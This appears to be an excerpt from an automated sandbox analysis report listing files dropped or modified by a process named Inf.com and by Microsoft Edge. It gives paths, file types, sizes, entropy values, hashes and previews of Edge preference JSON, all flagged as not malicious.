                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4814
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                                  MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                                  SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                                  SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                                  SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096735953059218
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY89giDPFs9XFwcGoup1Xl3jVu:z/Ps+wsI7ynEn6W/83chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8503EFB3B0FEC700BBD5EB179C003218
                                                                                                                                                                                                                                                                                                  SHA1:A74CF29A9BFB3044D62F7EB7A13457C7F1DB4FAB
                                                                                                                                                                                                                                                                                                  SHA-256:B435356CE1710F4FF7B6E0FE5052AFC6EBCA38CD4512E83864B5F2D841B4D2FB
                                                                                                                                                                                                                                                                                                  SHA-512:CB6D770FD8C97CAF15F195F48C59EC8F896EE905BC7EB8887F34E7EAE4964E9E25404B26756CAB510ABCFCBDF7D8B446F8A6C274D6CA557AFA00A48589B882B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):43746
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0952459646356445
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBdwuihDO6vP6OgdpElQM4vcGoup1Xl3jVzXr4CCA8:z/Ps+wsI7ynEh6AUechu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:32A00C0FF7229CED1B31D2693BADEA77
                                                                                                                                                                                                                                                                                                  SHA1:BAA825E259995C2BB45E925C0D0108F07D401937
                                                                                                                                                                                                                                                                                                  SHA-256:982491D3A02EB78AA4D1D4BFCC821BEED8D8D4300DC67909DCEF8A5D21C8D7AD
                                                                                                                                                                                                                                                                                                  SHA-512:DF10BFEB147403E287D6920B3463841749209B6BB4B9AE905A1A1CAA0AF06AD2EEF7843CF0CB958E8A7BD0596B901A72769F8A2890194B3C621C77869F844460
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096429768973822
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY8lniuFV5JcGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6W/8Bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:2C4C4744A156AE1231DFCF2326B7C5A2
                                                                                                                                                                                                                                                                                                  SHA1:42B9F602F4B3530C080CAF7064CBC9039AC31664
                                                                                                                                                                                                                                                                                                  SHA-256:4773BCEFB2502E9BBF40D315BA71737A98C6EBD777AE0BFE7DD41F817725A727
                                                                                                                                                                                                                                                                                                  SHA-512:EC8F015569DF10929561873AB4CFDE3F7E7844F4CB0B2A93913B9AEE9BCD39CCFC7B9D959DE6085B7C4CDFBEC7F7E46553FC2C61746337DDCA2C7BA9166FEE71
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096429768973822
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY8lniuFV5JcGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6W/8Bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:2C4C4744A156AE1231DFCF2326B7C5A2
                                                                                                                                                                                                                                                                                                  SHA1:42B9F602F4B3530C080CAF7064CBC9039AC31664
                                                                                                                                                                                                                                                                                                  SHA-256:4773BCEFB2502E9BBF40D315BA71737A98C6EBD777AE0BFE7DD41F817725A727
                                                                                                                                                                                                                                                                                                  SHA-512:EC8F015569DF10929561873AB4CFDE3F7E7844F4CB0B2A93913B9AEE9BCD39CCFC7B9D959DE6085B7C4CDFBEC7F7E46553FC2C61746337DDCA2C7BA9166FEE71
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096404854264658
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBKwuwhDO6vP6O2lIY8V241FerxAcGoup1Xl3jVzXq:z/Ps+wsI7yOEi6W/8dchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:5529E96074EE0A4C62B285D3F956829C
                                                                                                                                                                                                                                                                                                  SHA1:9C1E339EC0E085C044449888E02E684F687494EA
                                                                                                                                                                                                                                                                                                  SHA-256:0DF1B3ADB2B789FD02B16C0C4C1B5265B89A929FCF64562C9043A4EAFE2E67C7
                                                                                                                                                                                                                                                                                                  SHA-512:E2A2B68916C1AAE49AFFBA8D0FEB4D8B890E03135CF6F7E7C870D095C4A1142B5710F1C5CEDE9493EEF44EBAA72580F8C52F7964B4DC15FF3178FEFFEA007734
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):43746
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0952459646356445
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBdwuihDO6vP6OgdpElQM4vcGoup1Xl3jVzXr4CCA8:z/Ps+wsI7ynEh6AUechu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:32A00C0FF7229CED1B31D2693BADEA77
                                                                                                                                                                                                                                                                                                  SHA1:BAA825E259995C2BB45E925C0D0108F07D401937
                                                                                                                                                                                                                                                                                                  SHA-256:982491D3A02EB78AA4D1D4BFCC821BEED8D8D4300DC67909DCEF8A5D21C8D7AD
                                                                                                                                                                                                                                                                                                  SHA-512:DF10BFEB147403E287D6920B3463841749209B6BB4B9AE905A1A1CAA0AF06AD2EEF7843CF0CB958E8A7BD0596B901A72769F8A2890194B3C621C77869F844460
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45874
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088539112280987
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5d9SWXkuNhDO6vP6O2lIY8V241FerxA9N2aPiCAopGoup1Xl3jV7:DMk1rT8H19SWM6W/8d98aPiRophu3Vlf
                                                                                                                                                                                                                                                                                                  MD5:C08DDA3A4BD9005BC0A61252E5867789
                                                                                                                                                                                                                                                                                                  SHA1:BCA14183CD41D7FB89D0524F59A88FE6A2408781
                                                                                                                                                                                                                                                                                                  SHA-256:4C6465C8EBB912899626DE96DA8C6479CE7A724EBFDC48200A78A2448B3C29F1
                                                                                                                                                                                                                                                                                                  SHA-512:35467FBCD5A9BC883DF77D40F036C72E8D77EFB4765065C73109189E85F8B70CA6121D925E0F45CF27BE9D3F0039AFDABA7741C47C00B3D21450E99B2809C959
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279286"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45827
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088787501721106
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5d9StkuNhDO6vP6O2lIY8V241FerxA9N2aPiCAopGoup1Xl3jVzf:DMk1rT8H19Sy6W/8d98aPiRophu3VlXP
                                                                                                                                                                                                                                                                                                  MD5:4878169B0A6217C4FA8BC4C64859A051
                                                                                                                                                                                                                                                                                                  SHA1:D7A22C6B397A0B0A0BA378394055512C5861D965
                                                                                                                                                                                                                                                                                                  SHA-256:1BEFA057835B2961B36B25085046907C450CAE01623873881C32FF0C14AF0506
                                                                                                                                                                                                                                                                                                  SHA-512:9A1B47753FF2FEF60C0C07A167DC2D839E92D1468939B664B042D4F402C4B0442E04822F37B0894777EA068917C7A6C9103BBB2EBA028E5D066E43396FC6251B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279286"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                  MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                  SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                  SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                  SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03892847287316021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:JD0o3tmP6rVZxJu4c4NgsXjiwE0foYhAwNFCAgTQbMm8En8y08Tcm2RGOdB:90stdHiqphZTCNmn08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:002B3CE07C7036D2264B40B9A64BC635
                                                                                                                                                                                                                                                                                                  SHA1:662FB5C9D8220B7CBE718455E21ADE0031A8F630
                                                                                                                                                                                                                                                                                                  SHA-256:301C3590280B4E1DC32028997CF8437378693BB29292686BA4E1E3C41F9E0146
                                                                                                                                                                                                                                                                                                  SHA-512:6F94D45571F80AF35A2009FC299E35B9517FC362CBF79FC8F64B621FFE4DD488B7A5191A9C48DB76380EB393959484E8A341D5155800DDA2788427776A77FA69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 134217728.000000, slope 75015551881388056232440365056.000000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4244024230801336
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:DZI1wOE6lMUS+iz+59SzVCK1BrE/STye5EG6Ysq/ntW/jeg1HFm:u1wEVaCSRCK1+/je5eYsqVW/jeaHM
                                                                                                                                                                                                                                                                                                  MD5:E8973C8F6CBA5DB1177990DECBFDF622
                                                                                                                                                                                                                                                                                                  SHA1:5F7129B12393151EF1DBE017D97E9C1EEA663220
                                                                                                                                                                                                                                                                                                  SHA-256:37306E9623F8CFD73BAD4193D4329AC0179F60D55AFACCFFA6EEA4C54D3CFAC0
                                                                                                                                                                                                                                                                                                  SHA-512:41371285C153B6FE28A90DE8478058F641C02CB9AC38DE3053C17C2FAA0249119EE2CE163BA8DDFCADC20EC0F5237F3BB3407510736542157EB6B333AD9A7298
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.045408880791223794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:JMNw40o3tm0nOAWV6Y6JZpjrZXpAgMA7fh+7NEJItdGRQ8RVMPDn8y08Tcm2RGOD:p40stjMSRNFhwVurMb08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:E5318F370A52C3D876BC7D9C646B0E3B
                                                                                                                                                                                                                                                                                                  SHA1:569E24040225E03455D2FFD960514A10E70B75AA
                                                                                                                                                                                                                                                                                                  SHA-256:5671E168E1A638FE156716B8D25BE28715A4A22BFF140187882709D76F8129F3
                                                                                                                                                                                                                                                                                                  SHA-512:B52F40AF0A9E6FBE9CA17586688B9D1A33A49E39D4B464C5F337B420108E094E0BF580A9F80634A986661F1D453B504A2765348A536162340EF6F757D9D6205D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                                  MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                                  SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                                  SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                                  SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17033
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.447935645125418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:stp+PGQSu4zszkfhpdEPicibGjQwR6WmaTYm:sGOXu/kfvdVbGcaCaTYm
                                                                                                                                                                                                                                                                                                  MD5:138F0BCE9E342AD0C077D9D6AF0F55A7
                                                                                                                                                                                                                                                                                                  SHA1:208F3A109BE99A188E3810FD93A4A3660F8A87A8
                                                                                                                                                                                                                                                                                                  SHA-256:FF6EAB15A1AB130B056EE3D972E2DC86BB79B1A4101D6A10E256EF5046E2281E
                                                                                                                                                                                                                                                                                                  SHA-512:273F8C656B8B73F0DF8360A5879EC66F93DC7C34ADE4AA176EACFA95FD07A80CA63110981D8D89FE4B7F6749569CAB08DB9FC982988FC58ACF60FA1F29422B68
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561102447617546
                                                                                                                                                                                                                                                                                                  Encrypted:false
